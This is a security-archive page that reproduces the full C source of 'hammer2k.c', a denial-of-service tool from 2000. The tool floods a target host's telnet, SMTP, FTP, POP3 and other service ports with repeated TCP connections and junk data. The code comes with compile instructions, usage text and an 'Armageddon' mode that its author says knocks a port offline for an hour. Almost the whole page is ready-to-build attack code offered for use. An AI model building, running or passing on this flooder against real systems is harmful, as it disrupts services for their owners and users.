exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hammer2k.c

hammer2k.c
Posted Jun 1, 2000
Authored by Threx | Site inferno.tusculum.edu

hammer2k.c v0.8 is a simple denial of service tool which makes multiple open connections to a destination host/port.

tags | denial of service
SHA-256 | 3db6d684de52e8e44e6cfa3a11986fd7ca4fe6eda5993221e841496a363a7549

hammer2k.c

Change Mirror Download
/*
::::: Hammer2K version 0.8 ::::: A DoS Tool
By: Threx <threx@attrition.org>
http://inferno.tusculum.edu/~threx

---------GREETS------------
== People that helped in the development of Hammer2K (testing & ideas)==
vortek, Mister-X, DigiEbola, xsprite, & xum_mux
== Good People ==
Everyone on #svun on undernet, operat0r, codewarrior, Sp0ar, d0g,
soulslack, syphix, ziricon, Temujin, Terminal, Th3 M@niac, WeaponsX
Bernz, Hellrider, Rezin, APHC (http://aphc.cjb.net)

---------COMPILE-----------
Simply enter the following command.

bigblue:~# gcc hammer2k.c -o hammer2k

---------DISCLAIMER--------
I TAKE NO RESPONSIBLITY FOR YOUR ACTIONS WITH HAMMER2K. YOU WILL USE THIS
AT YOUR OWN RISK!
*/


#include <sys/stat.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/types.h>
#include <unistd.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *msg = "123456789123456789123456789123456789123456789123456789";

int sock;
int b;
int X;
int p;
int l;
int len;
int a;
int Usage(char *ARG);
int tcp(void);
int armageddon(void);
int all(void);


struct hostent *he;
struct sockaddr_in target;


int main(int argc, char *argv[])
{



if (argc < 4)
{
Usage(argv[0]);
}




if ((he=gethostbyname(argv[1])) == NULL)
{
printf("\n ERROR: hostname lookup failed \n");
exit(1);
}



if (strcmp(argv[2], "-telnet")==0)
{
p = 23;
l = 1800;
}
else if (strcmp(argv[2], "-inetd")==0)
{
p = 113;
l = 4000;
}
else if (strcmp(argv[2], "-pop2")==0)
{
p = 109;
l = 3000;
}
else if (strcmp(argv[2], "-imap2")==0)
{
p = 143;
l = 4000;
}
else if (strcmp(argv[2], "-finger")==0)
{
p = 79;
l = 1400;
}
else if (strcmp(argv[2], "-smtp")==0)
{
p = 25;
l = 740;
}
else if (strcmp(argv[2], "-ftp")==0)
{
p = 21;
l = 800;
}
else if (strcmp(argv[2], "-pop3")==0)
{
p = 110;
l = 1350;
}
else if (strcmp(argv[2], "-netstat")==0)
{
p = 15;
l = 1300;
}
else
{
printf("\n ERROR: Hammer2K doesn't support that service. \n");
}



if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n ERROR: fatal socket error \n");
exit(1);
}

target.sin_family = AF_INET;
target.sin_port = htons(p);
target.sin_addr = *((struct in_addr *)he->h_addr);

if (connect(sock, (struct sockaddr *)&target, sizeof(target)) ==
-1)
{
printf("\n ERROR: fatal connection error \n");
exit(1);
}



a = atoi(argv[3]);

if (strcmp(argv[3], "-A")==0)
{
armageddon();
}
else if (strcmp(argv[3], "-NA")==0){
tcp();
}
else {
printf("\n ERROR: please use -A (Armageddon ON) or -NA (Armageddon off) \n");
}


}




int Usage(char *ARG)
{
printf("\n\n Hammer2K by Threx <threx@attrition.org>");
printf("\n Usage: Hammer2K <host> <service> <armageddon-mode>");
printf("\n ::<host>:: ");
printf("\n 0.0.0.0 ");
printf("\n target.net ");
printf("\n\n ::<service>:: ");
printf("\n -netstat ");
printf("\n -ftp ");
printf("\n -telnet ");
printf("\n -smtp ");
printf("\n -finger ");
printf("\n -pop2 ");
printf("\n -imap2 ");
printf("\n -pop3 ");
printf("\n\n ::<armageddon-mode>:: ");
printf("\n -NA = Armageddon Mode Off");
printf("\n -A = Armageddon Mode On\n\n");
exit(1);
}




int armageddon(void)
{

int loop;
int number;

loop = 10;

printf("\n\nHammer2K by Threx <threx@attrition.org>");
printf("\nHomepage http://inferno.tusculum.edu/~threx");
printf("\n Armageddon Mode is [ON] (This will kill a port for one hour)\n");
printf("\n\n Flooding port......\n\n");

for(number = 1; number < loop; number++)
{
for(X = 1; X < l; X++)
{
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n ERROR: fatal socket error \n");
exit(1);
}

target.sin_family = AF_INET;
target.sin_port = htons(p);
target.sin_addr = *((struct in_addr *)he->h_addr);

if (connect(sock, (struct sockaddr *)&target,
sizeof(target)) == -1)
{
goto timer;
}

if ((send(sock, msg, len, 0)) == -1)
{
printf("\n ERROR: fatal send error \n");
exit(1);
}


len = strlen(msg);
send(sock, msg, len, 0);
close(sock);

}


timer:
system("sleep 600");
}
printf("\n Port %d has been killed for one hour. \n\n", p);
close(sock);

return 0;


}



int tcp(void)
{
printf("\n\nHammer2K by Threx <threx@attrition.org>");
printf("\nHomepage http://inferno.tusculum.edu/~threx");
printf("\n Armageddon Mode is [OFF]]\n");
printf("\n\n Flooding port......\n\n");
for(X = 1; X < l; X++)
{

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n ERROR: fatal socket error \n");
exit(1);
}

target.sin_family = AF_INET;
target.sin_port = htons(p);
target.sin_addr = *((struct in_addr *)he->h_addr);

if (connect(sock, (struct sockaddr *)&target,
sizeof(target)) == -1)
{
printf("\n Port %d: Killed \n", p);
exit(1);
}

if ((send(sock, msg, len, 0)) == -1)
{
printf("\n ERROR: fatal send error \n");
exit(1);
}


len = strlen(msg);
send(sock, msg, len, 0);
close(sock);
}


printf("\n Port %d: Port assumed to be open. \n\n", p, l);
close(sock);

return 0;

}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close